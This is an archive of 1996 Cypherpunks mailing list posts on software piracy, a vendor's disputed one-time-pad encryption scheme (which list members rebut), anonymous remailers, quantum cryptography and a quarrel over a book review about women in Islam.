> > shouldn't complain when the taxi driver takes him, not to his requested
> > destination, buit some dark alley where Mr Anon gets clunked over the
> > head and his wallet removed. The locals need the money more than Mr
> > rich-tourist-on-vacation Anon.  They're only doing socialist justice,
> > after all.
> > 
> > Property is property. Theft is theft.
> 
> Such absolutism! And an awful analogy (not entirely worthless, but
> not very good either).

True, there is a certain amount of indicision in my mind as to the
value of keeping software valuable through sale, and obtaining it
virtually free of charge. Yes I develop software.

> Has nothing to do with socialism... even works nice in a capitalist
> as in the case where people try the software, decide they like it,
> and then buy it latter when they can afford it. Sidekick and WordStar
> became popular because of this "borrowing".  MS-DOS probably would not
> be so widespread if it weren't pirated.

Uh huh? And you are saying that there were *heaps* of computers out
there which could run MS-DOS which didn't come with it? And how much
more would those companies have made had the products been *forced* to
be sold rather than pirated.

*chuckle*

Of course these days, with M$ having the monopoly over all software on
PC's and Billy being worth what he is, it's a moot point...

<snip>

Intellectual property is all very well to develop, but it should
really be considered a limited resource at any point in time, and as
such be ownership restricted in much the same way as natural resources
are in Oz.

Mining licenses are only kept where the owner can show a certain
amount of development. In the same way patents of "intellectual" or
developing technology should be granted under a license to develop
principle only. (with the option to lose)

I'm not saying that intellectual property should come any more under
the banner of Big Sibling[1], but the existing regulatory bodies
should probably be forced to adopt these measures.

[1] This might be in an archive by the time that the CDA Mk II comes
out with the politically correct clauses.[2]
[2] I'm not laughing. My country's regulatory body sat this week to
start on our 'net legislational recommendations. I hope to hell you
people get your CDA sorted out before our lot uses it as a precedent.
--
Packrat (BSc/BE;COSO;Wombat Admin)
Nihil illegitemi carborvndvm.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 20 Feb 1996 15:21:17 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602200401.XAA05145@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.960219213302.16459A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Feb 1996, Perry E. Metzger wrote:

> 
> "Richard J. Coleman" writes:
> > I'm way out of my league here, but using a small OTP to create a
> > larger OTP seems impossible on information theoretic grounds.
> 
> No, you are correct.
> 
> Perry

But it's got rotors! Rotors I tell you!

Hiss, squeak. Hiss, squeak.  Hiss, squeak. 

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 20 Feb 1996 14:29:33 +0800
To: cypherpunks@toad.com
Subject: Prosecutor Violates CDA--Film at Eleven
Message-ID: <ad4e8ae4060210046373@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:12 AM 2/20/96, Brian Davis wrote:
>On Mon, 19 Feb 1996, jim bell wrote:
>
>> it just didn't occur to me that you'd object to this.  "Nettiquette" is new
>> to me.                                                  ^^^^^^^^^^^^^^^^^^ >
>  ^^^^^^
>
>No shit.


Brian,

While I agree with your point of view, I must inform you that your word is
one of the "Seven Dirty Words" and that you have thus violated the
Communications Decency Act. There are several self-admitted minors
(including several high school students) subscribed to the Cypherpunks
list, so use of such indecent language as the above is a violation of the
CDA on the face of it.

I presume you will not be allowed to prosecute yourself.


--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Tue, 20 Feb 1996 15:31:51 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers not heard from; info?
Message-ID: <2.2.32.19960220054832.006f46ac@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:52 PM 2/19/96 -0600, "David E. Smith" <dsmith@midwest.net> wrote:

>Don't some remailers support the "Cutmarks"
>header, which does essentially that?

Yup. I clean forgot about it, truth to tell.

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Tue, 20 Feb 1996 15:39:25 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers not heard from; info?
Message-ID: <2.2.32.19960220054834.006cc5d4@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


>Further, in an earlier message Bruce Baugh asked why some remailers did not
>more promptly remail their messages. 

No, Tim, I didn't. I asked why I was noticing a secular slowdown _relative
to last month_ when I did the same thing I'm doing now. Then I asked the
same question for the last couple of days relative to the end of the last week.

I understand why there are delays. And how to set latency. And a number of
other things. This is none of those.

I'll take the heat for what I do write. I'm not claiming to be an expert, I
do make mistakes, I do get confused, when it's appropriate I'll take a few
"RTFMs" (as with cutmarks). In return, though, I don't take the heat for
what I don't write.

I will also point out that I asked at least a few of these questions when I
posted my January results. Particularly, I'm curious to get a better handle
on what elements of the process I'm using lead to such different time
results from, say, Raph's pinging chart. Local site? The scummy service
through which too much Portland traffic has to pass? Other factors? Dunno.
Met with deafening silence last month, apart from some thank-yous on the
side from folks who appreciated having things already formatted with times
rather than needing the extra step of reading the codes.

[Side note: I see myself as offering a supplement to services like Raph's.
Obviously I can't compete in timeliness or comprehensiveness of coverage. On
the other hand, I do think my usage reflects much more closely what happens
when people actually send traffic through remailers, and I go for maximum
clarity of presentation. In other words, I'm building on others' work. No
inflating of ego is intended or implied; some settling of arches may have
occurred during shipping.]

So I'm asking again. I've had some helpful notes on the side from remailer
operators, to whom my thanks. I'd like to learn more.

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Tue, 20 Feb 1996 15:32:40 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers not heard from; info?
Message-ID: <2.2.32.19960220054841.006fbd60@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:39 PM 2/19/96 -0800, Raph Levien <raph@kiwi.cs.berkeley.edu> wrote:

>   This is simply the "cut" feature of remailers, which is already
>implemented.

Right you are. I posted without thinking, and deserve the RTFM here.

>while. There may be publicly known functioning remailers which are not
>on my list, but I rather tend to doubt it.

Since I'm getting my list of remailers from you :-), I don't know about them
either.

I really wish I could get a lead on...well, I just put all that in a post to
Tim May, no need to duplicate it all. I'll cheerfully accept both info and
pointers to info for thsoe questions, though.

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Tue, 20 Feb 1996 13:16:21 +0800
To: cypherpunks@toad.com
Subject: Re: Guaranteed snake-oil, er, privacy...
Message-ID: <v02120d0cad4ee67b55b6@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 6:02 PM 2/19/96, geeman@best.com forwarded:

>      If You Break our System, You've Bought our Company!

        Isn't "You break it, you buy it" the kind of sign that merchants
put up near _fragile_ things? Must be some new security strategy: threaten
would-be attackers with hanging the albatross of a hemorrhaging corporation
around their neck...
        Who knows? Maybe it'll work. Not sure how much pleasure I'd take in
a "Hack IPG" mug if I had to face years of litigation.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Olcay Cirit <olcay@libtech.com>
Date: Tue, 20 Feb 1996 14:05:40 +0800
To: cypherpunks@toad.com
Subject: Re: PING packets illegal?
In-Reply-To: <31229D6B.59C6@mail.hh.provi.de>
Message-ID: <199602200259.VAA04564@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Markus L. Noga" <mlnoga@mail.hh.provi.de> wrote:
>I think there is an implementation of IDEA called TinyIDEA that will fit 
>in <512 bytes. Why don't you try it?

There is a version of Idea written by Fauzan Mirza in 448 bytes of ASM
(80x86)

	-olcay

- --
"For he who lives more lives than one, |) Olcay Cirit -- olcay@libtech.com
   more deaths than one must die"      (| http://www.libtech.com/olo2.html

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSk5GSoZzwIn1bdtAQHrJAF/UFAhOQJ+7VgpcjgwXext1lIxGt1+NdPb
dVj1pggNXEW8OT85ci/Ttxptfc+gIHmG
=1rkY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 20 Feb 1996 14:30:12 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960219183616.5326D-100000@citrine.cyberstation.net>
Message-ID: <199602200306.WAA11013@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


I, too, am interested in seeing the underlying algorithms.  Not
because I don't believe that they work, but because I'm interested in
seeing what you may have found that no one else has.  However from
your recent mailing I think I know what you're doing:

> Starting with an OTP as seed? The algorithm may be fixed in a sense, but 
> it employs a truse hardware random OTP to select intial settings, adds, 
> and limits, so every one is new and unique - a lot of algorithnms can 
> generate pseudfo trandom numbers, but onece you knw the algorithm, you 
> can generate the random sequence. Our system does not do that - in 
> oReder to solve the system, you must know what OTP was used, that is what 
> was the true hardware generated OTP. Unless you know what that was, 
> knowing the algorithm does nothing for you. If you understand that 
> principle you understand the system. 

I think this is the key.  Question: if I knew the starting "OTP" that
seeded your algorithms, would I be able to re-create the whole stream
and decrypt a message?  I suspect the answer is "yes".  However if I
knew the algorithm you were using, could I decrypt the message without
the use of the "OTP" key?  I don't know the answer to this question.
I hope the answer is no.  Assuming it is no, then I ask you: when can
I see the algorithm you are using.  Following is an example of why
knowledge of the algorithm is useful but not harmful:

Example: Let's assume I can securely exchange a "OTP" (key) with
someone.  I now run some algorithm using that "OTP", add in the
plaintext, and out comes a random stream which is the encrypted
message.  Is this similar to what POTP does?  I believe the answer is
"yes".  Let me submit that what I described here I can do with DES
using ofb mode to generate a random number stream with which I encrypt
the message.  The fact that I know I used DES does not help me decrypt
the message.  I still need the "OTP" key in order to figure out which
stream of random bits were used to encrypt the message.

> Perhaps so, but our system does employ a true hardware generated OTP, and 
> operates similiar to what you describe -  however, the important 
> differernce is that we use a smal;l OTP to generate a larger OTP, like 
> stringing the cable across the Golden Gate narrows. Just becuase we 
> convert over from a full OTP to a prime number wheel system configured 
> from the OTP doers not mnean that the result is not an OTP - in theory it 

Actually, this statement is false.  What you have is a pseudo one-time
pad, not a true one-time pad.  It's close, though.  The problem is
that the means that you use to convert the smaller OTP to a larger OTP
may be "flawed", and that is the algorithm that I think most people
here want to see.  I do believe that the 5600-bit OTP key material
that you distribute is random.  You claim it is hardware generated; I
believe that.  However that doesn't help me feel any less wary about
the algorithm you use to convert that 5600-bit OTP to a larger
pseudo-random stream.

At best, you have a cipher with a 5600-bit key.  If this is so, I
congratulate you on it.  However I think that I, and others on this
list, would like to see how it is accomplished.  This is mostly
because I believe people here are wary of such systems; key management
and random number generation is a tricky business, and its very easy
to make a slip and get it wrong.  Just look at Netscape and other
systems which have fallen to simple attacks.

I think that people here would like to prove whether or not your
system is vulnerable to such attacks.  Just remember that if it is not
vulnerable, as you claim, then you have nothing to worry aout and you
will gain the acknowledgement of the cypherpunks behind you.  On the
other hand, wouldn't you rather that you know if your system has a
flaw, rather than having some cracker discover it and try to exploit
it rather than inform you?  That is a choice you will have to make.

I believe the cypherpunks offer still stands:  to test your algorithm.

The choice is yours.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 20 Feb 1996 13:24:28 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Easy Nuclear Detonator
In-Reply-To: <m0tof8q-0008xmC@pacifier.com>
Message-ID: <Pine.BSF.3.91.960219221127.16659N-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 19 Feb 1996, jim bell wrote:

> it just didn't occur to me that you'd object to this.  "Nettiquette" is new
> to me.                                                  ^^^^^^^^^^^^^^^^^^ > 
  ^^^^^^

No shit.

> Jim Bell
> 
> jimbell@pacifier.com.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Tue, 20 Feb 1996 15:32:41 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602200306.WAA11013@toxicwaste.media.mit.edu>
Message-ID: <Pine.BSD/.3.91.960219212229.11721A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 19 Feb 1996, Derek Atkins wrote:

> I, too, am interested in seeing the underlying algorithms.  Not
> because I don't believe that they work, but because I'm interested in
> seeing what you may have found that no one else has.  However from
> your recent mailing I think I know what you're doing:
> 
> > Starting with an OTP as seed? The algorithm may be fixed in a sense, but 
> > it employs a truse hardware random OTP to select intial settings, adds, 
> > and limits, so every one is new and unique - a lot of algorithnms can 
> > generate pseudfo random numbers, but once you know the algorithm, you 
> > can generate the random sequence. Our system does not do that - in 
> > oReder to solve the system, you must know what OTP was used, that is what 
> > was the true hardware generated OTP. Unless you know what that was, 
> > knowing the algorithm does nothing for you. If you understand that 
> > principle you understand the system. 
> 
> I think this is the key.  Question: if I knew the starting "OTP" that
> seeded your algorithms, would I be able to re-create the whole stream
> and decrypt a message? 

Answer - No, there are other things involved, time to microseconds, as 
well as the actual algorithm, recipient - name and relative number, and 
an additional user OTP. Remember that every OTP is a true OTP, and a new 
one is used for each transmission. The information to recreate the 
starting OTP is transmitted but is encrypted with the real starting OTP set,
so it is not easy to figure out what the starting OTP is.

Isuspect the answer is "yes".  However if I
> knew the algorithm you were using, could I decrypt the message without
> the use of the "OTP" key?

  I don't know the answer to this question.
> I hope the answer is no. 


It is definitely NO: You must have the the individual OTP to XOR out the 
message - It is the key to the encryption, and the obvious decryption.
The algorithm is impotent without the OTP.

 Assuming it is no, then I ask you: when can
> I see the algorithm you are using.  Following is an example of why
> knowledge of the algorithm is useful but not harmful:
> 
> Example: Let's assume I can securely exchange a "OTP" (key) with
> someone.  I now run some algorithm using that "OTP", add in the
> plaintext, and out comes a random stream which is the encrypted
> message.  Is this similar to what POTP does?  I believe the answer is
> "yes".  Let me submit that what I described here I can do with DES
> using ofb mode to generate a random number stream with which I encrypt
> the message.  The fact that I know I used DES does not help me decrypt
> the message.  I still need the "OTP" key in order to figure out which
> stream of random bits were used to encrypt the message.

 That is true, except you have a monstrous problem with key distribution 
 and the generation of the OTP keys. In effect, such a system would be 
 can OTP system, except it would not be as clean and as fast, and as 
 simplye as XORing the plain text with the OTP. 

> 
> > Perhaps so, but our system does employ a true hardware generated OTP, and 
> > operates similiar to what you describe -  however, the important 
> > differernce is that we use a small OTP to generate a larger OTP, like 
> > stringing the cable across the Golden Gate narrows. Just becuase we 
> > convert over from a full OTP to a prime number wheel system configured 
> > from the OTP doers not mnean that the result is not an OTP - in theory it 
> 
> Actually, this statement is false.  What you have is a pseudo one-time
> pad, not a true one-time pad.  It's close, though.


  I cannot argue with that characterization;however, I would point out 
  that a true One Time Pad must qualify as unpredictable, not 
  absolute random. We could generate indeterminate length OTPs but they 
  become unwieldy for huge files because the lengths must correspond - so 
  we have gone to the propogating method! 

  The problem is
> that the means that you use to convert the smaller OTP to a larger OTP
> may be "flawed", and that is the algorithm that I think most people
> here want to see.  I do believe that the 5600-bit OTP key material
> that you distribute is random.  You claim it is hardware generated; I
> believe that.  However that doesn't help me feel any less wary about
> the algorithm you use to convert that 5600-bit OTP to a larger
> pseudo-random stream.
> 
> At best, you have a cipher with a 5600-bit key. 

Yes, but it would be trival and not that big of a space problem to 
expand to a 10,000 bit key, or even a 20,000 bit key. We simply change a 
few parameters, in the C programs.

 If this is so, I
> congratulate you on it.  However I think that I, and others on this
> list, would like to see how it is accomplished.  This is mostly
> because I believe people here are wary of such systems; key management
> and random number generation is a tricky business, and its very easy
> to make a slip and get it wrong.  Just look at Netscape and other
> systems which have fallen to simple attacks.

We will provide you with a free demonstration if you would like. We will 
also provide you with the methodology in written form, but becuase of 
certain methods employed, we will not release the source code - we want 
tio buy some time.

In general, you will find the kernel of the propgations consists of 64 
equation sets of the form:

       Bi=(Bi+Ci MOD Di) Mod 256             Large prime numbers  
       ENCRYPTEXTi=OTP[Bi] XOR PLAINTEXTi    Encryption
       OTP[Bi]=ENCRYPTEXTi                   Makes the OTP Dynamic

Where the intial Bis, Cis and Dis are all randomly selected from a 
tables of 2048 random prime numbers, the 5600 bit OTP is used to make 
the selections from the 6144 prime numbers, Dis are always larger than 
either Cis or Bis. The Cis and Dis are also different prime mods of 256, 
there might be some repeats but not many from a selection of 64 from 
a set of 6144. The effect is that you put a plain text character into the 
system and the envcrypted character is XORed against a random character and 
the resultant becomes a part of the dynamically changing OTP. 

There is a little more to it but that is the essence!
> 
> I think that people here would like to prove whether or not your
> system is vulnerable to such attacks.  Just remember that if it is not
> vulnerable, as you claim, then you have nothing to worry aout and you
> will gain the acknowledgement of the cypherpunks behind you.  On the
> other hand, wouldn't you rather that you know if your system has a
> flaw, rather than having some cracker discover it and try to exploit
> it rather than inform you?  That is a choice you will have to make.
> 
> I believe the cypherpunks offer still stands:  to test your algorithm.


We would be most interested in allowing the cyberpunks to examine the 
program and use it as they like. We will provide source code for the 
propgation kernel, generating the large pseudo OTP from the real OTP - 
Actually there are two real time pads involved - a user oriented one and 
a message oriented one, nut that os only used to secure a user and for 
some smoothing operations. But that is the gist of it. 

> 
> The choice is yours.
> 
> -derek
> 

Try it, you will like it:






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Tue, 20 Feb 1996 15:57:45 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <v01540b0bad4f1941ad31@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



Some thoughts on the rash of IPG OTP cluelessness:

If I set up a radioactive source, I can almost certainly get 1000 bits per
second of random data from it. Chop it up into 5 second chunks and sell em.
That's 5000 bits without all that messy rotor stuff.

Why throw out 30% - 50% of the OTPs? Any filtering algorithm will reduce
the randomness of the resulting numbers. My guess is that the "hardware"
randomness generator has very little entropy and a) produces numbers with a
bell curve distribution, so concentrating what little entrpy there is, and
b) *repeats* a whole lot of the time. That's what they throw out.

They know that encryption has something to do with prime numbers so they
throw in a little obfuscation with the rotor thing. Why bother?

And of course, since they supply all the locks and all the keys, they can
search for, locate, and read anybody's communication whenever they want.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard J. Coleman" <coleman@math.gatech.edu>
Date: Tue, 20 Feb 1996 14:51:46 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960219183616.5326D-100000@citrine.cyberstation.net>
Message-ID: <199602200340.WAA16734@redwood.skiles.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Perhaps so, but our system does employ a true hardware generated OTP, and 
> operates similiar to what you describe -  however, the important 
> differernce is that we use a smal;l OTP to generate a larger OTP, like 
> stringing the cable across the Golden Gate narrows. Just becuase we 
> convert over from a full OTP to a prime number wheel system configured 
> from the OTP doers not mnean that the result is not an OTP - in theory it 
> is simple to break RSA systems, but factoring a 2048 bit number, or 4096 
> number, or whatever, makes the problem enormous  - our system for large 
> messages/files is similiar in difficult except that it is much nearer 
> an 8192 bit number than 2048. The possibilities to be examined ar4e so 
> large, that iot is not possible to solve then with a computer, even if 
> all the particles in the iuniverse, all 10 to the 80 power of then were 
> a Cray T3E, or better.  Furthermore, all you would get would be all the 
> possiblilities which would be everything!

I'm way out of my league here, but using a small OTP to create a
larger OTP seems impossible on information theoretic grounds.

Richard Coleman
coleman@math.gatech.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phil G. Fraering" <pgf@srl01.cacs.usl.edu>
Date: Tue, 20 Feb 1996 15:27:44 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Optical repeaters
Message-ID: <199602200444.AA01625@srl03.cacs.usl.edu>
MIME-Version: 1.0
Content-Type: text/plain


   From: tcmay@got.net (Timothy C. May)
   Newsgroups: hks.lists.cypherpunks

\Given that a quantum cryptography system depends on *single photons* to
/work, I'm not sure that talk of amplifification makes sense. Between source
\and receiver, a photon either makes it or doesn't. If it makes it, it makes
/it will its full "quanta" of energy, of course. If it doesn't make it, due
\to tunnel-penetrating the walls of the fiber or scattering off an impurity
/in the fiber, then it just doesn't make it, so no
\amplification/regeneration is possible. (Regenerate _what_?)

/But the quantum measurement issue, aside from the above, is an
\interesting one.  We have to be careful here (and I'm including
/myself, not just using the royal "we"). It isn't clear to me that the
\amplification/regeneration process counts as making a measurement,
/from some recent work I've read (sorry, don't recall the references,
\but could be a recent issue of "Scientific American"). In interference
/measurements, the wave function collapses if individual photons are
\counted and recorded (whatever "recorded" really means...) and the
/interference pattern vanishes. If the photons are not counted and/or
\recorded, the pattern reappears.

/By analogy, it is not clear to me that a simple regeneration mechanism,
\with no local observer or recording apparatus, will collapse the wave
/function.

I'm sorry I quoted so much, but let's think for a second: what is
a regeneration mechanism going to do?

Idea number one: It could act on an individual photon. This photon
could have its energy per photon increaced. Except for doppler effects
or possibly some wierd non-conservative electric/magnetic fields (and
I'm just starting again, and can't remember if there are some obscure
non-conservative electric fields), I don't think there are any methods
that don't involve <<measurement>> of the photon. Please note that the
known ways of "pumping" a photon's frequency, such as interaction with
electrons in the orbitals of atoms in a crystal lattice, involve
<<measurement>>.

Please note I'm using the term <<measurement>> in brackets so that the
physics-challenged here will realize that what is being discussed is
the Q-M concept of measurement and not the sending out of some guy
with a yardstick to look at photons.

Another idea that occured to me is that the number of photons are
being manipulated: one photon spawns many. As a practical example,
check any image-intensifier tube.

\Seems to me an experiment may have already been done along these
/lines: separate fibers producing an interference pattern and then these
\inline amps added...if the interference pattern remains, as I would expect,
/then the amps/regenerators did not constitute a "measurement" in QM terms.

I'm getting the impression of an optical-loop interferometer that
relies on the timing of a photon's arrival as the first-order
effect in the generation of an interference pattern. I'm not sure if
it'll work, but I'm willing to bet there are some useful optical-loop
interferometer experiments that don't rely on preserving all the
states of the photons in question. Don't ring gyroscopes rely on
measuring path length?

Other than the two examples I mentioned above, the only things I could
think of involved modifying quantum parameters themselves, which is
what's supposed to be avoided, right?

BTW, since I'm not on cypherpunks and am reading this sporadically
thanks to news.hks.net (thanks guys!), could y'all email any responses
to me?

I think I need that refresher course in electrodynamics and Q-M pretty
bad. 


\--Tim May

/Boycott espionage-enabled software!
\We got computers, we're tapping phone lines, we know that that ain't allowed.
/---------:---------:---------:---------:---------:---------:---------:----
\Timothy C. May              | Crypto Anarchy: encryption, digital money,
/tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
\W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
/Higher Power: 2^756839 - 1  | black markets, collapse of governments.
\"National borders aren't even speed bumps on the information superhighway."

I'd delete that but it's a work of art... 

Getting back to more real-world applications, anyone out there have
any ideas why netscape's stock is still so high when all the stuff
they came out with that was allegedly secure basically wasn't?

And more immediate than that, I was thinking of ordering some
textbooks using a borrowed credit card from a bookstore in Oregon.
Is it safe now? ;-)

If it turns out to not have been safe, can I sue Netscape for false
advertizing, even if I knew it was false?

Phil

Phil Fraering           "Nice shark...
pgf@srl03.cacs.usl.edu   _pretty_ shark..."
========================================================================
is it just me, or is everyone else having bsd flashbacks too?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 20 Feb 1996 14:03:37 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Piracy Bests ITAR
Message-ID: <199602200354.WAA04032@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 19, 1996 01:29:14, 'Alan Horowitz <alanh@infi.net>' wrote: 
 
 
> 
>> From: Anonymous <nobody@REPLAY.COM> 
>> Some economists have made a good case that slack 
>> enforcement of such rules may sometimes do little harm. 
>> Local firms benefit by acquiring pirated technology more 
>> cheaply than the real thing; consumers acquire affordable 
>> high-tech products and close copies of branded goods. 
> 
>Yes, when Mr Anon travels to a beach in Jamaica or in Mombasa, he  
>shouldn't complain when the taxi driver takes him, not to his requested  
>destination, buit some dark alley where Mr Anon gets clunked over the  
>head and his wallet removed. The locals need the money more than Mr  
>rich-tourist-on-vacation Anon. 
 
I haven't accepted the original argument that A. Horowitz critiques. 
 
However, there appears to be at least two errors in his counter argument. 
 
1) Mr Anon is a real human being; the corporation is a legal fiction. Mr
Anon has a real head; the corporation does not. Mr. Anon has suffered a
real assault; the corporation has not. 
 
2) Mr Anon has a real use for his money. The original argument was, I
believe, that the tech etc. was appropriated in an area of the world where
no one could afford it, etc. As in: I write a book. I get money for it in
NYC where people buy it. I get mugged in NYC and my money is stolen. VERSUS
Soneone in an area of the world where my book is not sold makes a xerox
copy of the book. 
 
The crimes if crimes they be are not the same. 
 
> 
> They're only doing socialist justice,  
>after all. 
> 
 
Naturally, I expect all the members of the Libertarian Party and the non-LP
libertarians who sent me e-mail and who posted to the list will post
similar things about this fallacy in logic, won't you. (Note to T.C. May:
This is not really sarcasm and not rhetorical hyperbole. It is more
"wishful thinking" on my part. 
 
> 
>Property is property. Theft is theft. 
> 
 
I believe the original quote from Proudhoun was "property is theft" but who
is counting. On the other hand, "2 + 2 = 4" and if my aunt had wheels and
ran down 5th Avenue she'd be a trolley. So what?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 20 Feb 1996 14:06:30 +0800
To: "Richard J. Coleman" <coleman@math.gatech.edu>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602200340.WAA16734@redwood.skiles.gatech.edu>
Message-ID: <199602200401.XAA05145@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Richard J. Coleman" writes:
> I'm way out of my league here, but using a small OTP to create a
> larger OTP seems impossible on information theoretic grounds.

No, you are correct.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 20 Feb 1996 14:11:06 +0800
To: Sean Gabb <cea01sig@gold.ac.uk>
Subject: Re: Online Zakat Payment: Religious tithe.
In-Reply-To: <Pine.SUN.3.91.960220000606.29900A-100000@scorpio.gold.ac.uk>
Message-ID: <Pine.SV4.3.91.960219231306.1589A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Is American law derived from a single source? Does America have one 
common law - or fifty different jurisdictions.

Lets cut this thread off. You don't want to admit that you are uttering 
religious slurs. It doesn't matter to me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Tue, 20 Feb 1996 09:47:40 +0800
To: Alan Horowitz <cypherpunks@toad.com
Subject: Re: Online Zakat Payment: Religious tithe.
In-Reply-To: <Pine.SUN.3.91.960219203150.24154F-100000@scorpio.gold.ac.uk>
Message-ID: <Pine.SUN.3.91.960220000606.29900A-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I did say I wouldn't send this review.  But having broken purdah once 
already this evening, I see no harm in doing so again.

Sean Gabb.

This article was published in Free Life, No. 20, August 1994.

       _The Status of Women in Islam_
             Dr Jamal A. Badawi
 Islamic Propagation Centre International (UK),
     Birmingham, no date, 28 pp, Pounds 1.05
                  (No ISBN)


I have  among my books  various works  by Hewlett Johnson,  the
"red Dean  of Canterbury", published  in the  1940s.  In  their
gushing, literal  acceptance  of every  Soviet  lie, they  read
oddly like  one of  Peter Simple's  parodies.  Was  this man  a
fool?   Was he a  villain?   Was he something of  both?  I have
never bothered  checking.   All  I can  say is  that his  works
remain  a good  example  of how  a  thoroughly evil  system  of
thought and  government can be  portrayed with  some persuasive
force as its exact opposite.

Reading Dr Badawi's pamphlet puts me strongly in  mind of these
works.  Of course,  I should never dream of  calling its author
a villain or exactly a fool.  I have no doubt that he  believes
every word  he has written, or  that he has some  understanding
of the  matters here discussed.  Even so, he does put forward a
point of view that is supported neither by a candid reading  of
the sacred  texts to which he appeals, nor by the most fleeting
glance at  any of  the societies,  now or  ever existent,  that
have taken these texts at all seriously.

Dr Badawi begins:

     The accusation that Islam oppresses women  is nothing
     new   but  a  perpetuation   of  the   centuries  old
     deliberate  distortion and  misrepresentation of  the
     Western world. (p.5)

He concludes, _inter alia_:

     It   is  impossible   for  anyone   to  justify   any
     mistreatment of women  by any decree of rule embodied
